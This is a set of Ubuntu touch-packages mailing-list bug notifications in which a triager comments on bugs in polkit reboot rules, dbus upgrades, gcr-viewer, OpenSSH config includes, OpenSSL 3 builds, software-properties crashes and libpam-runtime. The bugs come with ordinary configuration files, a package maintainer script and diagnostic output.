To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1970459/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account

2022-04-20 Thread Seth Arnold
** Also affects: systemd (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to systemd in Ubuntu.
https://bugs.launchpad.net/bugs/1969593

Title:
  rules to prevent non-root users from rebooting not taken into account

Status in policykit-1 package in Ubuntu:
  New
Status in systemd package in Ubuntu:
  New

Bug description:
  On fresh Ubuntu Jammy installation, I add a 
"/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the 
following contents :
  [Disable power-off]
  Identity=unix-user:*
  Action=org.freedesktop.login1.power-off
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable power-off when others are logged in]
  Identity=unix-user:*
  Action=org.freedesktop.login1.power-off-multiple-sessions
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable_reboot]
  Identity=unix-user:*
  Action=org.freedesktop.login1.reboot
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable_reboot_when_others_are_logged_in]
  Identity=unix-user:*
  Action=org.freedesktop.login1.reboot-multiple-sessions
  ResultActive=no
  ResultInactive=no
  ResultAny=no


  
  It must prevent non-root users from shutdowning and rebooting the system. But 
it only prevent shutdowning. Rebooting is still possible for a non-root user.

  We can see it using pkcheck command (as a non-root user) :
  $ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo 
$?
  Not authorized.
  1
  $ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $?
  0

  
  As this problem can lead to unexpected reboot on multi-users systems (a 
disponibilty concern), I checked the "This bug is a security vulnerability" box.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: policykit-1 0.105-33
  ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30
  Uname: Linux 5.15.0-25-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Apr 20 10:53:27 2022
  InstallationDate: Installed on 2022-04-20 (0 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 
(20220419)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no username)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: policykit-1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1969593] Re: rules to prevent non-root users from rebooting not taken into account

2022-04-20 Thread Seth Arnold
** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to policykit-1 in Ubuntu.
https://bugs.launchpad.net/bugs/1969593

Title:
  rules to prevent non-root users from rebooting not taken into account

Status in policykit-1 package in Ubuntu:
  New

Bug description:
  On fresh Ubuntu Jammy installation, I add a 
"/etc/polkit-1/localauthority/90-mandatory.d/restriction.pkla" file with the 
following contents :
  [Disable power-off]
  Identity=unix-user:*
  Action=org.freedesktop.login1.power-off
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable power-off when others are logged in]
  Identity=unix-user:*
  Action=org.freedesktop.login1.power-off-multiple-sessions
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable_reboot]
  Identity=unix-user:*
  Action=org.freedesktop.login1.reboot
  ResultActive=no
  ResultInactive=no
  ResultAny=no

  [Disable_reboot_when_others_are_logged_in]
  Identity=unix-user:*
  Action=org.freedesktop.login1.reboot-multiple-sessions
  ResultActive=no
  ResultInactive=no
  ResultAny=no


  
  It must prevent non-root users from shutdowning and rebooting the system. But 
it only prevent shutdowning. Rebooting is still possible for a non-root user.

  We can see it using pkcheck command (as a non-root user) :
  $ pkcheck --action-id org.freedesktop.login1.power-off --process $PPID ; echo 
$?
  Not authorized.
  1
  $ pkcheck --action-id org.freedesktop.login1.reboot --process $PPID ; echo $?
  0

  
  As this problem can lead to unexpected reboot on multi-users systems (a 
disponibilty concern), I checked the "This bug is a security vulnerability" box.

  ProblemType: Bug
  DistroRelease: Ubuntu 22.04
  Package: policykit-1 0.105-33
  ProcVersionSignature: Ubuntu 5.15.0-25.25-generic 5.15.30
  Uname: Linux 5.15.0-25-generic x86_64
  ApportVersion: 2.20.11-0ubuntu82
  Architecture: amd64
  CasperMD5CheckResult: pass
  CurrentDesktop: ubuntu:GNOME
  Date: Wed Apr 20 10:53:27 2022
  InstallationDate: Installed on 2022-04-20 (0 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Release amd64 
(20220419)
  ProcEnviron:
   TERM=xterm-256color
   PATH=(custom, no username)
   XDG_RUNTIME_DIR=
   LANG=fr_FR.UTF-8
   SHELL=/bin/bash
  SourcePackage: policykit-1
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/policykit-1/+bug/1969593/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot

2022-04-19 Thread Seth Arnold
This may be a duplicate of https://launchpad.net/bugs/1969162

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845

Title:
  Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
  reboot

Status in dbus package in Ubuntu:
  New

Bug description:
  Upgrading on a virtual machine from 20.04 to 22.04. I have had this
  happen twice now, I got one upgrade done without this bug.

  Basically the package installation stops at dbus package asking for a
  reboot as it was unable to upgrade as dbus-daemon was running. And
  rebooting at this stage obviously will cause a non-functioning system.

  Added a screenshot of the upgrade window.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1969118] Re: Certificate viewer shows extra bytes for RSA keys

2022-04-19 Thread Seth Arnold
Hello Mikko, thanks for the report; I believe that's working as
intended, those bytes are part of the DER encoding; there's an excellent
answer at https://crypto.stackexchange.com/a/19982/1400 that describes
the meanings of each of those bytes.

Thanks

** Information type changed from Private Security to Public Security

** Changed in: gcr (Ubuntu)
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gcr in Ubuntu.
https://bugs.launchpad.net/bugs/1969118

Title:
  Certificate viewer shows extra bytes for RSA keys

Status in gcr package in Ubuntu:
  Invalid

Bug description:
  When I view a x509 certificate using

  gcr-viewer .../path/to/certificate.pem

  and open the "Details" section and check the RSA public key
  information, the section that lists the public key renders extra 8
  bytes at the start and 5 bytes at the end which are not actually part
  of the key.

  I haven't tried if this happens with other file types except x509, or
  with encryption methods except RSA. The exact certificate I viewed can
  be downloaded from https://crt.sh/?d=6454583403 and the expected
  public key modulus should start with 00:b6:28:0b:44:... but the
  certificate viewer shows public key starting with bytes 30 82 01 0A 02
  82 01 01 00 B6 28 0B 44. Note the extra bytes 30 82 01 0A 02 82 01 01.
  The extra bytes seem to be static and do not change after re-lanching
  the viewer again. There are also extra bytes in the end of the
  displayed key.

  I'm marking this bug as a security vulnerability for now because

  (1) This tool is supposed to used to check encryption credentials, and
  (2) It's still unknown if this is some kind of 8 byte underflow/5 byte 
overflow or just a rendering problem. I'm not aware of the viewer writing extra 
bytes to any memory location so I would assume this is just a rendering issue.

  I'm fine with this issue being public so feel free to publish at your
  discretion.

  ProblemType: Bug
  DistroRelease: Ubuntu 18.04
  Package: gcr 3.28.0-1
  ProcVersionSignature: Ubuntu 5.4.0-107.121~18.04.1-lowlatency 5.4.174
  Uname: Linux 5.4.0-107-lowlatency x86_64
  ApportVersion: 2.20.9-0ubuntu7.27
  Architecture: amd64
  CurrentDesktop: MATE
  Date: Thu Apr 14 15:47:18 2022
  EcryptfsInUse: Yes
  InstallationDate: Installed on 2019-01-05 (1194 days ago)
  InstallationMedia: Ubuntu 18.04.1 LTS "Bionic Beaver" - Release amd64 
(20180725)
  SourcePackage: gcr
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gcr/+bug/1969118/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot

2022-04-19 Thread Seth Arnold
Here's the postinst I've got for that package. Maybe the
reload_dbus_config() could use a --reply-timeout=5000 or something?

Thanks

$ cat /fst/trees/ubuntu/main/d/dbus/dbus_1.12.20-2ubuntu4/debian/dbus.postinst 
#!/bin/sh
# Copyright © 2003 Colin Walters 
# Copyright © 2006 Sjoerd Simons 

set -e

MESSAGEUSER=messagebus
MESSAGEHOME=/var/run/dbus
LAUNCHER=/usr/lib/dbus-1.0/dbus-daemon-launch-helper

# This is what the init script would do, but it's simpler (and less
# dependent on sysvinit vs. Upstart vs. etc.) if we do it directly.
reload_dbus_config() {
[ -S /var/run/dbus/system_bus_socket ] || return 0

dbus-send --print-reply --system --type=method_call \
--dest=org.freedesktop.DBus \
/ org.freedesktop.DBus.ReloadConfig > /dev/null || true
}

if [ "$1" = triggered ]; then
reload_dbus_config
exit 0
fi

if [ "$1" = configure ]; then
adduser --system \
--quiet \
--home /nonexistent \
--no-create-home \
--disabled-password \
--group "$MESSAGEUSER"

if ! dpkg-statoverride --list "$LAUNCHER" >/dev/null; then
dpkg-statoverride --update --add root "$MESSAGEUSER" 4754 "$LAUNCHER"
fi

# This is idempotent, so it's OK to do every time. The system bus' init
# script does this anyway, but you also have to do this before a session
# bus will work, so we do this here for the benefit of people starting
# a temporary session bus in a chroot
dbus-uuidgen --ensure
fi

if [ "$1" = configure ] && [ -n "$2" ]; then
# On upgrades, we only reload config, and don't restart (restarting the
# system bus is not supported by upstream). The code added by
# dh_installinit -r creates a start action, below.

# Recommend a reboot if there is a dbus-daemon running in the same root
# as us. Deliberately not using anything init-related here, to be
# init-agnostic: if we get a false positive (at least one dbus-daemon
# is running but it isn't the system bus) that isn't the end of the
# world, because it's probably a session bus, so the user needs to
# log out and back in anyway.
#
# Debian has /usr/bin/dbus-daemon, Ubuntu has /bin/dbus-daemon.
# Look for both.
if pidof -c /bin/dbus-daemon /usr/bin/dbus-daemon >/dev/null; then
echo "A reboot is required to replace the running dbus-daemon." >&2
echo "Please reboot the system when convenient." >&2

# trigger an update notification that recommends a reboot
# (used by unattended-upgrades etc.)
touch /var/run/reboot-required || true

if ! grep -Fqsx dbus /run/reboot-required.pkgs; then
echo dbus >> /run/reboot-required.pkgs || true
fi

# same thing for the older update-notifier interface
[ -x /usr/share/update-notifier/notify-reboot-required ] && \
/usr/share/update-notifier/notify-reboot-required || true
fi

# Clean up old compatibility symlinks that were used to upgrade from
# Debian 8 to Debian 9. This can be dropped after Debian 10 is released.
for bus in system session; do
conf="/etc/dbus-1/${bus}.conf"
exp_target="/usr/share/dbus-1/${bus}.conf"
target="$(readlink -f "${conf}")" || continue

if [ -h "${conf}" ] && [ "_${target}" = "_${exp_target}" ]; then
rm -f "${conf}"
fi
done
fi

#DEBHELPER#

# Do this after the debhelper-generated bits so that dpkg-maintscript-helper
# will have finished moving configuration files around. We only need to do
# this for upgrades, not new installations.
if [ "$1" = configure ] && [ -n "$2" ]; then
reload_dbus_config
fi

# We don't start dbus.service in postinst, so ensure dbus.socket is running
if [ "$1" = configure ] && [ -d /run/systemd/system ]; then
systemctl try-restart sockets.target || true
fi

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845

Title:
  Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
  reboot

Status in dbus package in Ubuntu:
  New

Bug description:
  Upgrading on a virtual machine from 20.04 to 22.04. I have had this
  happen twice now, I got one upgrade done without this bug.

  Basically the package installation stops at dbus package asking for a
  reboot as it was unable to upgrade as dbus-daemon was running. And
  rebooting at this stage obviously will cause a non-functioning system.

  Added a screenshot of the upgrade window.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1968845] Re: Upgrade to 22.04 from 20.04 ends with dbus installation asking for a reboot

2022-04-19 Thread Seth Arnold
Yikes, does it actually *stop* at that point? That's .. not ideal.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to dbus in Ubuntu.
https://bugs.launchpad.net/bugs/1968845

Title:
  Upgrade to 22.04 from 20.04 ends with dbus installation asking for a
  reboot

Status in dbus package in Ubuntu:
  New

Bug description:
  Upgrading on a virtual machine from 20.04 to 22.04. I have had this
  happen twice now, I got one upgrade done without this bug.

  Basically the package installation stops at dbus package asking for a
  reboot as it was unable to upgrade as dbus-daemon was running. And
  rebooting at this stage obviously will cause a non-functioning system.

  Added a screenshot of the upgrade window.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dbus/+bug/1968845/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1968305] Re: sshd_config.d overrides not working

2022-04-08 Thread Seth Arnold
This reminds me of several previous bugs; this may or may not be a
duplicate, and this may or may not be intentional behaviour. Hopefully
these are are useful and save some debugging effort:

https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1922212
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1876320
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1873528

Especially 1873528 feels like most likely to be relevant, I suggesting
reading that one first.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1968305

Title:
  sshd_config.d overrides not working

Status in openssh package in Ubuntu:
  New

Bug description:
  Creating an sshd_config override file under /etc/ssh/sshd_config.d/
  does not override settings from /etc/ssh/sshd_config

  From debugging sshd, I can see the override file is indeed being read,
  and the option is supposedly set. But after testing, the options are
  not taking effect.

  Specifically, in the main sshd_config, I have disabled PasswordAuthentication
  In my override file, PasswordAuthentication is enabled

  Yet, when connecting to the server, it only checks public/private
  keys.

  
  This is for an environment where we have our default sshd_config, and in 
specific use-cases, we might enable PasswordAuthentication for some servers.

  ProblemType: Bug
  DistroRelease: Ubuntu 20.04
  Package: openssh-server 1:8.2p1-4ubuntu0.4
  ProcVersionSignature: Ubuntu 5.13.0-39.44~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-39-generic x86_64
  ApportVersion: 2.20.11-0ubuntu27.21
  Architecture: amd64
  CasperMD5CheckResult: pass
  Date: Fri Apr  8 10:37:42 2022
  InstallationDate: Installed on 2021-11-04 (154 days ago)
  InstallationMedia: Ubuntu-Server 20.04.3 LTS "Focal Fossa" - Release amd64 
(20210824)
  SourcePackage: openssh
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1968305/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1968047] Re: Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and 3.3.3 problem with the openssl-dev package

2022-04-06 Thread Seth Arnold
Hopefully this is helpful for you:

https://sources.debian.org/data/main/r/ruby3.0/3.0.3-1/debian/patches/Update-
openssl-to-version-3.0.0.patch

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssl in Ubuntu.
https://bugs.launchpad.net/bugs/1968047

Title:
  Ubuntu 22.04 Beta - Unable to compile ruby version 2.7.5, 3.0.3 and
  3.3.3  problem with the openssl-dev package

Status in openssl package in Ubuntu:
  New

Bug description:
  This problem only exists in Ununto 22.04 beta
  When attempting to comple ruby (any version - I have tried 2.7.5, 3.0.3 & 
3.1.1) it fails becuase of a problem with the libssl-dev package.  The previous 
version of Ubuntu used version 1.1.1.  The new version uses 
openssl-dev/libssl-dev 3.0.2

  $ lsb_release -rd
  Description:Ubuntu Jammy Jellyfish (development branch)
  Release:22.04

  sudo apt-cache policy libssl-dev
  libssl-dev:
Installed: 3.0.2-0ubuntu1
Candidate: 3.0.2-0ubuntu1
Version table:
   *** 3.0.2-0ubuntu1 500
  500 http://au.archive.ubuntu.com/ubuntu jammy/main amd64 Packages
  100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/1968047/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1965661] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'

2022-03-22 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1965661

Title:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

Status in software-properties package in Ubuntu:
  New

Bug description:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

  ProblemType: Crash
  DistroRelease: Ubuntu 22.04
  Package: software-properties-gtk 0.99.19
  ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27
  Uname: Linux 5.15.0-23-generic x86_64
  NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: pass
  CrashCounter: 1
  CurrentDesktop: ubuntu:GNOME
  Date: Sun Mar 20 03:33:53 2022
  ExecutablePath: /usr/bin/software-properties-gtk
  InstallationDate: Installed on 2022-03-20 (0 days ago)
  InstallationMedia: Ubuntu 22.04 LTS "Jammy Jellyfish" - Alpha amd64 (20220319)
  InterpreterPath: /usr/bin/python3.10
  PackageArchitecture: all
  ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab 2
  ProcEnviron:
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=en_US.UTF-8
   SHELL=/bin/bash
  Python3Details: /usr/bin/python3.10, Python 3.10.2+, python3-minimal, 
3.10.1-0ubuntu2
  PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab', '2']
  PythonDetails: N/A
  SourcePackage: software-properties
  Title: software-properties-gtk crashed with AttributeError in 
packages_for_modalias(): 'Cache' object has no attribute 'packages'
  UpgradeStatus: No upgrade log present (probably fresh install)
  UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1965661/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1965857] Re: software-properties-gtk crashed with AttributeError in packages_for_modalias(): 'Cache' object has no attribute 'packages'

2022-03-22 Thread Seth Arnold
** Information type changed from Private Security to Public

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to software-properties in
Ubuntu.
https://bugs.launchpad.net/bugs/1965857

Title:
  software-properties-gtk crashed with AttributeError in
  packages_for_modalias(): 'Cache' object has no attribute 'packages'

Status in software-properties package in Ubuntu:
  New

Bug description:
  live patch not active

  ProblemType: Crash
  DistroRelease: Ubuntu 22.04
  Package: software-properties-gtk 0.99.19
  ProcVersionSignature: Ubuntu 5.15.0-23.23-generic 5.15.27
  Uname: Linux 5.15.0-23-generic x86_64
  ApportVersion: 2.20.11-0ubuntu79
  Architecture: amd64
  CasperMD5CheckResult: unknown
  CurrentDesktop: ubuntu:GNOME
  Date: Tue Mar 22 10:22:47 2022
  ExecutablePath: /usr/bin/software-properties-gtk
  InstallationDate: Installed on 2020-04-25 (695 days ago)
  InstallationMedia: Ubuntu 20.04 LTS "Focal Fossa" - Release amd64 (20200423)
  InterpreterPath: /usr/bin/python3.10
  PackageArchitecture: all
  ProcCmdline: /usr/bin/python3 /usr/bin/software-properties-gtk --open-tab=6
  ProcEnviron:
   LANGUAGE=en_IN:en
   PATH=(custom, user)
   XDG_RUNTIME_DIR=
   LANG=en_IN
   SHELL=/bin/bash
  Python3Details: /usr/bin/python3.10, Python 3.10.3, python3-minimal, 
3.10.1-0ubuntu2
  PythonArgs: ['/usr/bin/software-properties-gtk', '--open-tab=6']
  PythonDetails: N/A
  SourcePackage: software-properties
  Title: software-properties-gtk crashed with AttributeError in 
packages_for_modalias(): 'Cache' object has no attribute 'packages'
  UpgradeStatus: Upgraded to jammy on 2022-02-12 (37 days ago)
  UserGroups: adm cdrom dip lpadmin lxd plugdev sambashare sudo

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/software-properties/+bug/1965857/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1885990] Re: server: Match has no effect in include file (upstream 3122)

2022-03-16 Thread Seth Arnold
I can't speak for the SRU team, but it's entirely possible that if you
prepare and test a debdiff, and show that this can be fixed, you could
drive an SRU through to completion; see
https://wiki.ubuntu.com/StableReleaseUpdates for more information.

Thanks

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1885990

Title:
  server: Match has no effect in include file (upstream 3122)

Status in portable OpenSSH:
  Unknown
Status in openssh package in Ubuntu:
  Fix Released

Bug description:
  Hello

  Ubuntu version: focal 20.04 LTS
  Version:
  openssh-server:
Installed: 1:8.2p1-4ubuntu0.1
Candidate: 1:8.2p1-4ubuntu0.1
  Expected: match statement in included files work as documented in the fine 
manual
  What happens: the statements are ignored.

  
  If you add Match statements in an included file, it will generate no error 
but have no effect.
  The exact same statements work in the main server config file 
(/etc/ssh/sshd_config)

  this is to track upstream bug 3122:

  https://bugzilla.mindrot.org/show_bug.cgi?id=3122

  it's fixed but will only be in 8.4 so it affects Ubuntu 20.04 LTS
  where openssh is at 8.2.

  I'm not *absolutely* whining for a backport since include files is a
  new feature for openssl in focal so it's not a regression. Would be
  nice though :),  because include files are standard for any server
  software in Linux since at least a decade...

To manage notifications about this bug go to:
https://bugs.launchpad.net/openssh/+bug/1885990/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1964642] Re: Packer virtualbox ssh can't connect to unattended Ubuntu 20.04.1/2/3/4 but can connect to Ubuntu 20.4

2022-03-14 Thread Seth Arnold
Yeah it seems unlikely to be ssh to me -- can you ping the machine? does
virtualbox networking do interfaces that can ping? Does virtualbox offer
a 'console view' that you can use to debug the system?

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to openssh in Ubuntu.
https://bugs.launchpad.net/bugs/1964642

Title:
  Packer virtualbox ssh can't connect to unattended Ubuntu 20.04.1/2/3/4
  but can connect to Ubuntu 20.4

Status in openssh package in Ubuntu:
  New

Bug description:
  Two years ago I was able to create a Virtualbox Ubuntu 20.04 guest in a 
Windows 10 host with Packer 1.5.6, using an unattended installation.
  The Packer command was:
    "boot_command": [
  " ",
  "autoinstall ds=nocloud-net;s=http://{{ .HTTPIP }}:{{ .HTTPPort }}/",
  ""
    ],
  The user-data file was:
  #cloud-config
  autoinstall:
    version: 1
    identity:
  realname: mclibre
  hostname: ubuntu
  password: 
'$6$mclibre$YiuRPSZM3ZXVe4UyIqv1dvy9rUjf5/LsGCkDyaex.WN45wzVTuRmW5QLuctuicGAFZIO2M3QR8NLdtQYatKTn1'
  username: mclibre
    locale: es_ES.UTF-8
    keyboard:
  layout: es
    network:
  network:
    version: 2
    ethernets:
  ens33: {dhcp4: true, dhcp-identifier: mac}
    ssh:
  install-server: true
    late-commands:
  - sed -i 's/^#*\(send dhcp-client-identifier\).*$/\1 = hardware;/' 
/target/etc/dhcp/dhclient.conf
  - 'sed -i "s/dhcp4: true/&\n  dhcp-identifier: mac/" 
/target/etc/netplan/00-installer-config.yaml'
  Now, I have tried to create a Virtualbox Ubuntu 20.04.4/.3/.2/.1 guest using 
packer 1.5.6 but Packer can't create the image because once the installation is 
done, after rebooting the SSH server does not answer (the packer log error 
says: SSH handshake err: Timeout during SSH handshake).
  I have tried with the last version of Packer, Packer 1.8.0, and the result is 
the same. I can create a Ubuntu Server 20.4 image but not a Ubuntu Server 
20.4.1, .2, .3 or .4 image.
  I can provide as much aditional information as you want.
  Thanking you in advance,
  Bartolome Sintes

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1964642/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1964561] Re: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: installed libpam-runtime package post-installation script subprocess returned error exit status 25

2022-03-11 Thread Seth Arnold
Corruption was my first idea, too, but the Dependencies.txt didn't
report debsums mismatches. Thanks for the explanations.

** Also affects: debconf (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/1964561

Title:
  package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade:
  installed libpam-runtime package post-installation script subprocess
  returned error exit status 255

Status in debconf package in Ubuntu:
  New
Status in pam package in Ubuntu:
  New

Bug description:
  I found this bug when I upgrade my ubuntu 20.04 LTS using command
  "apt-get upgrade"

  ProblemType: Package
  DistroRelease: Ubuntu 20.04
  Package: libpam-runtime 1.3.1-5ubuntu4.3
  ProcVersionSignature: Ubuntu 5.13.0-35.40~20.04.1-generic 5.13.19
  Uname: Linux 5.13.0-35-generic x86_64
  NonfreeKernelModules: crc32_pclmul
  ApportVersion: 2.20.11-0ubuntu27.16
  Architecture: amd64
  CasperMD5CheckResult: skip
  Date: Fri Mar 11 10:43:38 2022
  ErrorMessage: installed libpam-runtime package post-installation script 
subprocess returned error exit status 255
  InstallationDate: Installed on 2022-03-10 (0 days ago)
  InstallationMedia: Ubuntu 20.04.2.0 LTS "Focal Fossa" - Release amd64 
(20210209.1)
  PackageArchitecture: all
  Python3Details: /usr/bin/python3.8, Python 3.8.5, unpackaged
  PythonDetails: N/A
  RelatedPackageVersions:
   dpkg 1.19.7ubuntu3
   apt  2.0.4
  SourcePackage: pam
  Title: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: 
installed libpam-runtime package post-installation script subprocess returned 
error exit status 255
  UpgradeStatus: No upgrade log present (probably fresh install)

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1964561/+subscriptions


-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1964561] Re: package libpam-runtime 1.3.1-5ubuntu4.3 failed to install/upgrade: installed libpam-runtime package post-installation script subprocess returned error exit status 25

2022-03-11 Thread Seth Arnold
These lines from the logs look most relevant:

Unpacking libpam-runtime (1.3.1-5ubuntu4.3) over (1.3.1-5ubuntu4.1) ...
Setting up libpam-runtime (1.3.1-5ubuntu4.3) ...
Can't locate object method "new" via package 
"Debconf::Element::Noninteractive::Multiselect" (perhaps you forgot to load 
"Debconf::Element::Noninteractive::Multiselect"?) at 
/usr/share/perl5/Debconf/FrontEnd.pm line 68,  line 8.
Use of uninitialized value $ret in scalar chomp at 
/usr/share/perl5/Debconf/Client/ConfModule.pm line 132,  line 7.
Use of uninitialized value $ret in split at 
/usr/share/perl5/Debconf/Client/ConfModule.pm line 133,  line 7.
Use of uninitialized value $ret[0] in string eq at 
/usr/share/perl5/Debconf/Client/ConfModule.pm line 134,  line 7.
